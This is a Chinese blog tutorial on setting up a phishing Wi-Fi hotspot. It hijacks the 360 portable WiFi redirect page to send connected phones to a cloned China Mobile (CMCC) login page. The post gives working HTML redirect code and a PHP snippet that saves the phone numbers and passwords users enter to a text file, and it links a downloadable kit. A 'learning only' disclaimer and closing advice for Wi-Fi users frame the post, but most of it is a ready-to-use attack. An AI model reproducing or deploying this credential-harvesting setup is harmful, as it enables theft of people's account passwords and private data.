本文长时间未进行更新,文中所描述的信息可能已发生改变,请谨慎参考。
文章内容仅供学习交流使用,请勿用于非法用途。
360随身WiFi
钓鱼热点虽说可用 WiFiDog 实现,但是实现起来比较复杂,由于只需要做到钓取账号密码,就不要做登录是否成功的判断及后续步骤。实现 360 随身 WiFi 有一个特点:当连接方式设置为“主人确认连接”,此时如有设备连接热点,360 随身 WiFi 就会在电脑上弹出连接请求。当请求未被同意,此时设备虽然能够连接热点,但没有网络访问权限,所有的网页请求都会被重定向到一个特定的网页上,这一点十分像 CMCC 的认证登录。本文就利用这一特点来搭建钓鱼热点,利用打开的那个特定网页作为跳板将所有 HTTP 请求二次重定向到登录页面,登录页面我们抓取 CMCC 的,本地使用 php 环境搭建简易认证系统,这样一个简单钓鱼热点就搭建完成。
重定向
找到 360 随身 WiFi 重定向指向的页面 wifi.html(路径一般是 C:\Program Files\360\360AP\web\wifi.html),修改这个页面使其打开时跳转到登录页面,这样未同意的设备连接后打开任意网页就会跳转到登录页面。
页面可以通过如下 2 种方法实现二次重定。
<!DOCTYPE html> <html> <head> <title>欢迎使用</title> <meta http-equiv = "Content-Type" content = "text/html; charset = utf-8" /> </head> <body> <script language = "javascript">document.location = "http://172.22.11.1:80/showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a"</script> </body> </html>
或者这样写
<!DOCTYPE html> <html> <head> <title>欢迎使用</title> <meta http-equiv = "refresh" content = "0;url=http://172.22.11.1:80/showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a"> </head> <body> <br /> </body> </html>
需要说明的是,这里的 IP 172.22.11.1 是随身 WiFi 热点的 IPv4 地址,不同电脑的热点 IP 可能不太一样,具体的可以通过 cmd 的 ipconfig 命令查看;80 是网页服务默认的端口号,可以不写;后面的showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a 是登录页面的根目录名称,这样写只是模仿 CMCC 的登录地址,起到一定的迷惑性,并没有其它用途。
PHP 环境搭建
为了记录手机号和登录密码,网页使用 php 语言来实现,php 的运行环境使用 phpStudy 一键搭建。设置的网站根目录是 D:\WWW\,将登录页面 index.php 和其它文件放在 D:\WWW\showlogin.dowlanuserip=211.137.185.106&wlanacname=0001.0000.000.00&ssid=CMCC&wlanparameter=2e67d27c82dfc8de62cd7d7a4942a37ff0d2eb72116e196a\ 目录下。
登录页面
登录页面是仿 CMCC 的,为了仿起来方便我就直接连接真正的 CMCC 用浏览器的查看其登录页面源代码,按原来的文件夹结构保存用到的 css、js、图片等文件,几乎不用修改就可以完美离线保存 CMCC 登录页面。添加php代码记录手机和登录密码,登录页面文件名修改为index.php,这样登录的手机号和密码就被记录在 pass.txt 里了。
<!-- 需要修改的部分 --> <?php $acco = @$_POST['account']; $pass = @$_POST['password']; if((strlen($acco) == 11)&&(strlen($pass)>5)){ $path = 'pass.txt'; $f = fopen($path,'a'); fwrite($f,"时间:"); fwrite($f,date("Y-m-d H:i:s")."\t"); fwrite($f,"账号:"); fwrite($f,$acco."\t"); fwrite($f,"密码:"); fwrite($f,$pass."\r\n"); fclose($f); } ?> <div class="content"> <form class="form-signin" action="index.php" method="post" > <div class="loginContent"> <ul class="login"> <li> <label for="username" class="sr-only">手机号码</label> <input type="text" id="account" name="account" class="normal" size="12" maxlength="20" required /> </li> <li> <label for="password" class="sr-only">密 码</label> <input type="password" id="password" name="password" class="normal" required /> <span class="loginCtrl"> <input value="获取短信密码" id="btnDynPwd" name="btnDynPwd" type="button" onclick="valifyApplyPwd()" /> <input type="hidden" id="cmccdynapw" name="cmccdynapw" value="" /> </span> </li> <li> <span style="color: red"> 山东省WLAN客户登录时发送806到10086获取登录密码。 </span> </li> <li> </li> <li> <label> </label> <button class="btn btn-lg btn-primary btn-block" type="submit">登录</button> </li> <li> </li> </ul> </div> </form> </div> <!-- 需要修改的部分 -->
简易 CMCC 钓鱼登录页面源码打包下载 访问密码 u6yj
后记
如果要实现认证登录,下面的这个文件可能会对你有所帮助。
C:\Users\Administrator\AppData\Roaming\360AP\config.ini
钓鱼 WiFi 不仅能钓取到 CMCC 账号和密码,通过 Wireshark、Fiddler 等抓包软件还可以抓取到用户的其它信息,正如央视“ 315 晚会”现场演示的那样,黑客利用虚假 WiFi 盗取晚会现场观众手机系统、品牌型号、自拍照片、邮箱帐号密码等各类隐私数据,甚至可以窃取到用户的银行账户、网络支付账户密码,从而实施资金的盗刷,即使是 CMCC 等熟悉的网络也一定要注意网络安全问题。
几点建议
第一,谨慎使用公共场合的 WiFi 热点。官方机构提供的而且有验证机制的 WiFi,可以找工作人员确认后连接使用。其他可以直接连接且不需要验证或密码的公共 WiFi 风险较高,背后有可能是钓鱼陷阱,尽量不使用。
第二,使用公共场合的 WiFi 热点时,尽量不要进行网络购物和网银的操作,避免重要的个人敏感信息遭到泄露,甚至被黑客银行转账。
第三,养成良好的 WiFi 使用习惯。手机会把使用过的 WiFi 热点都记录下来,如果 WiFi 开关处于打开状态,手机就会不断向周边进行搜寻,一旦遇到同名的热点就会自动进行连接,存在被钓鱼风险。因此当我们进入公共区域后,尽量不要打开 WiFi 开关,或者把 WiFi 调成锁屏后不再自动连接,避免在自己不知道的情况下连接上恶意 WiFi 。
文章最后,祝大家元旦快乐。^_^